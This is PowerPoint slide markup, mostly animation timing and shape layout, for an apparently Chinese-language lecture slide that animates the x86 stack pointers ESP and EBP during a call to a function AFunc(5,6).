                                    <p:animMotion origin="layout" path="M 1.38889E-6 0.11551 L 1.38889E-6 0.15764 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="78861"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="2106"/>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78875"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="54" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="78875"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="78875"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#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64" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 3.33333E-6 -0.03727 L 3.33333E-6 -0.07917 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-2106"/>
                                    </p:animMotion>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8876"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7887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2" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="4" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 1.38889E-6 0.15764 L 1.38889E-6 0.3676 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="68" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="78861"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="10486"/>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78877"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="73" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="78877"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="74" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="78877"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#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78882"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="79" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7888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xit" presetSubtype="10" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="83" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="78882"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="84" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="78882"/>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64" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 3.33333E-6 -0.07917 L 3.33333E-6 -0.12107 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="88" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-2106"/>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42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="5" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 1.38889E-6 0.3676 L 1.38889E-6 0.42801 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="92" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="78861"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="3009"/>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 calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="97" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="9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42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="6" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 1.38889E-6 0.42801 L 1.38889E-6 0.47778 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="102" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="78861"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="2477"/>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64" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 3.33333E-6 -0.1213 L 3.33333E-6 -0.36273 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="106" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-12083"/>
                                    </p:animMotion>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78878"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="111" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7887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63" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.02066 0.00509 L 0.17101 0.00509 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="115" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="9583" y="0"/>
                                    </p:animMotion>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2" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="7" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 1.38889E-6 0.47777 L 1.38889E-6 0.53032 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="119" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="78861"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="2616"/>
                                    </p:animMotion>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 presetClass="entr" presetSubtype="1" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="123" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="78879"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="124" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="78879"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="125" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="78879"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>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64" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 3.33333E-6 -0.36273 L 3.33333E-6 -0.48588 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="129" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-6157"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="130" fill="hold" nodeType="clickPar">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="131" fill="hold" nodeType="withGroup">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="132" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="8" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 1.38889E-6 0.53032 L 1.38889E-6 0.59328 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="133" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="78861"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="3148"/>
                                    </p:animMotion>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1" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="137" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="78880"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="138" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="78880"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="139" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="78880"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_h/2"/>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1" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="143" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="78881"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="144" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="78881"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="145" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="788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61" grpId="0" animBg="1"/>
      <p:bldP spid="78861" grpId="1" animBg="1"/>
      <p:bldP spid="78861" grpId="2" animBg="1"/>
      <p:bldP spid="78861" grpId="3" animBg="1"/>
      <p:bldP spid="78861" grpId="4" animBg="1"/>
      <p:bldP spid="78861" grpId="5" animBg="1"/>
      <p:bldP spid="78861" grpId="6" animBg="1"/>
      <p:bldP spid="78861" grpId="7" animBg="1"/>
      <p:bldP spid="78861" grpId="8" animBg="1"/>
      <p:bldP spid="78874" grpId="0" animBg="1"/>
      <p:bldP spid="78875" grpId="0" animBg="1"/>
      <p:bldP spid="78876" grpId="0"/>
      <p:bldP spid="78877" grpId="0" animBg="1"/>
      <p:bldP spid="78878" grpId="0" animBg="1"/>
      <p:bldP spid="78879" grpId="0" animBg="1"/>
      <p:bldP spid="78880" grpId="0" animBg="1"/>
      <p:bldP spid="7888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A7F811C-5B72-7C48-98A5-7F81B2925B9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6877050" y="1412875"/>
            <a:ext cx="1511300" cy="5400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9" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEC131F8-89E5-BE4E-AB3B-CB30D307E1A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6877050" y="5013325"/>
            <a:ext cx="1511300" cy="287338"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DB1513A-A9EC-0448-936D-276264395C7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5195888" y="3933825"/>
            <a:ext cx="1681162" cy="366713"/>
            <a:chOff x="3273" y="3158"/>
            <a:chExt cx="1059" cy="231"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29723" name="Line 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4480FC5F-69E2-9F42-B3BD-45C92837F801}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3923" y="3294"/>
              <a:ext cx="40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4" name="Text Box 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B01CF6EC-DA6D-C743-9E3C-71176CFF3C37}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3273" y="3158"/>
              <a:ext cx="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当前</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EBP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77520966-7EF8-2249-A6B1-D31E6E4FE9CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5202238" y="1412875"/>
            <a:ext cx="1674812" cy="366713"/>
            <a:chOff x="3277" y="2387"/>
            <a:chExt cx="1055" cy="231"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29721" name="Line 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D44C1512-7FAF-EF48-ADBD-FC1A410F6759}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3923" y="2519"/>
              <a:ext cx="40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2" name="Text Box 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71165B4A-B5F7-DB4B-A73F-2526C81FD5D2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3277" y="2387"/>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当前</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ESP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29702" name="Text Box 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{784BD589-22A0-9B40-8434-371FA29DFBEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="592138" y="1489075"/>
            <a:ext cx="34750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996666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>AFunc(5,6)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="996666"/>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call _AFunc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add esp+8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955" name="AutoShape 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EC6A7D7-CAEF-3B4E-AB27-454D3BC6A8D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="250825" y="4797425"/>
            <a:ext cx="360363" cy="431800"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 25000"/>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9704" name="Group 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{426B6677-FC24-8345-BDD1-506DACE330E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4284663" y="6256338"/>
            <a:ext cx="2592387" cy="366712"/>
            <a:chOff x="2699" y="3306"/>
            <a:chExt cx="1633" cy="231"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29719" name="Text Box 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B5A6115-0BC6-A146-B4DC-47549D9162F8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2699" y="3306"/>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语句执行前的</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1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EBP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29720" name="Line 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D837F25-B5F4-9245-A698-8FACD839CF7F}"/>
                </a:ext>
